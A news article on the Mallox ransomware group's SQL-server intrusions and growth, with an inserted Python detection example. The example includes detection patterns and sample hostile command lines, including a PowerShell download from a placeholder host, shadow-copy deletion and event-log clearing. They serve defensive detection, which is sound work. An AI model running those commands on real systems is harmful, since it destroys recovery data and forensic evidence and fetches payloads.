A ransomware actor with a penchant for breaking into target networks via vulnerable SQL servers has suddenly become very active over the past several months and appears poised to become an even bigger threat than it is already.
The group, tracked as Mallox — aka TargetCompany, Fargo, and Tohnichi — first surfaced in June 2021 and claims to have infected hundreds of organizations worldwide since then. The group’s victims include organizations in the manufacturing, retail, wholesale, legal, and professional services sectors.
Sudden Surge
Starting earlier this year, threat activity related to the group has surged, particularly in May, according to researchers at Palo Alto Networks’ Unit 42 threat intelligence team. Palo Alto’s telemetry, and that from other open threat intelligence sources, show a startling 174% increase in Mallox-related activity so far this year, compared to 2022, the security vendor said in a blog this week.
Previously, Mallox was known for being a relatively small and closed ransomware group, says Lior Rochberger, senior security researcher at Palo Alto Networks, who attributes the explosive activity to concerted efforts by group leaders to grow Mallox operations.
“In the beginning of 2023, it appears that the group started putting more efforts into expanding its operations by recruiting affiliates,” she says. “This can potentially explain the surge we observed during this year, and especially more recently, around May.”
The Mallox group’s typical approach for gaining initial access to enterprise networks is to target vulnerable and otherwise insecure SQL servers. Often the attack starts with brute forcing, where the adversary tries a list of commonly used passwords or known default passwords against an organization’s SQL servers.
Targeting Insecure SQL Servers
Researchers have observed Mallox exploiting at least two remote code execution vulnerabilities in SQL — CVE-2020-0618 and CVE-2019-1068, Rochberger says.
So far, Unit 42 has only observed Mallox infiltrating networks via SQL servers. But other researchers have reported recent attempts to distribute Mallox via phishing emails, suggesting that new affiliate groups are involved now as well, Rochberger says.
“After gaining access, the attackers use the command line and PowerShell to download the Mallox ransomware payload from a remote server,” Unit 42’s report this week noted.
As with many other ransomware infections these days, the payload first attempts to disable all services that would impede its ability to encrypt data on a victim system. It also tries to systematically delete shadow copies, so data restoration becomes harder once encryption is complete. In addition, the malware tries to clear all event logs using a common Microsoft command utility as part of an effort to complicate forensic analysis.
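The two behaviours described above, the password brute forcing against SQL servers and the post-access sequence (PowerShell download, shadow copy deletion, event log clearing), are what a defender would want to alert on. The following is an added detection example, not code from Unit 42 or the article, run over constructed sample events; the utility names (vssadmin, wmic, wevtutil), the host and IP values, the five-in-sixty-seconds threshold and the event schema are all assumptions, since the article names none of them.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Signatures for the post-access behaviour the report describes. The article does
# not name the utilities involved; vssadmin/wmic/wevtutil are assumed here.
SUSPICIOUS_CMDLINES = {
    "powershell_download": re.compile(r"powershell.*(downloadfile|downloadstring|invoke-webrequest|net\.webclient)", re.I),
    "shadow_copy_deletion": re.compile(r"vssadmin.*delete\s+shadows|wmic.*shadowcopy\s+delete", re.I),
    "event_log_clearing": re.compile(r"wevtutil(\.exe)?\s+cl\b", re.I),
}

def sql_bruteforce_sources(events, threshold=5, window=timedelta(seconds=60)):
    """Return {src: time of first alert} for sources with >= threshold failed SQL logins in any sliding window."""
    recent, alerts = defaultdict(deque), {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["kind"] != "sql_login_failed":
            continue
        ts, src = datetime.fromisoformat(ev["ts"]), ev["src"]
        q = recent[src]
        q.append(ts)
        while ts - q[0] > window:       # drop attempts older than the window
            q.popleft()
        if len(q) >= threshold and src not in alerts:
            alerts[src] = ev["ts"]
    return alerts

def suspicious_processes(events):
    """Return [(host, rule_name, cmdline)] for process-creation events matching a signature above."""
    hits = []
    for ev in events:
        if ev["kind"] != "process":
            continue
        for name, pattern in SUSPICIOUS_CMDLINES.items():
            if pattern.search(ev["cmdline"]):
                hits.append((ev["host"], name, ev["cmdline"]))
    return hits

# Constructed sample telemetry (not from the report): six failed 'sa' logins from one
# address within 40 seconds, one unrelated failure, then process events on the server.
SAMPLE_EVENTS = [
    {"ts": f"2023-05-02T10:00:{s:02d}", "kind": "sql_login_failed", "src": "203.0.113.7", "user": "sa"}
    for s in (1, 8, 15, 22, 30, 41)
] + [
    {"ts": "2023-05-02T10:05:00", "kind": "sql_login_failed", "src": "198.51.100.4", "user": "reports"},
    {"ts": "2023-05-02T10:06:10", "kind": "process", "host": "SQL01", "cmdline": "powershell -c Invoke-WebRequest http://placeholder.invalid/p.exe -OutFile p.exe"},
    {"ts": "2023-05-02T10:06:40", "kind": "process", "host": "SQL01", "cmdline": "vssadmin delete shadows /all /quiet"},
    {"ts": "2023-05-02T10:06:45", "kind": "process", "host": "SQL01", "cmdline": "wevtutil cl Security"},
    {"ts": "2023-05-02T10:07:00", "kind": "process", "host": "SQL01", "cmdline": "sqlservr.exe -sMSSQLSERVER"},
]
```

On the sample data the brute-force rule fires once for 203.0.113.7 at the fifth failure and the process rules flag the three post-access commands while leaving the legitimate SQL Server process alone; in production the thresholds and signatures would be tuned to the environment and fed from SQL Server login-failure events and process-creation telemetry.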
Mallox is a double extortion campaign, meaning the threat actors steal data from a victim environment before encrypting it. The group — like almost every other ransomware operation these days — maintains a website where it leaks data belonging to victims who refuse to accede to its ransom demands. Victim organizations can negotiate with Mallox operators via a Tor website using a unique private key to authenticate themselves. Mallox operators themselves claim to have breached hundreds of organizations worldwide. Unit 42 said its own telemetry indicates at least dozens of potential victims worldwide.
Mallox’s sudden burst of activity, while noteworthy, is unlikely to change anything for enterprise defenders or cause any new problems for them. A new report from the NCC Group this week showed a 221% increase in ransomware attacks this year over the same period in 2022. NCC Group said it counted a record 434 attacks in June 2023, most of them tied to the Cl0p ransomware group’s exploitation of the MOVEit file transfer vulnerability. The Cl0p group in total accounted for 90 ransomware attacks that NCC observed in June. Lockbit 3.0 was another very active threat actor over the period, NCC Group said.
As always, the best defense against the threat is to have a multilayered plan in place for addressing such attacks. “The Unit 42 team recommends making sure that all Internet-facing applications are configured properly, and all systems are patched and up to date wherever possible,” the security vendor advised. It’s also a good idea to have endpoint security controls in place for performing in-memory inspection to detect process-injection attempts, lateral movement efforts, and attempts to evade security controls, the vendor said.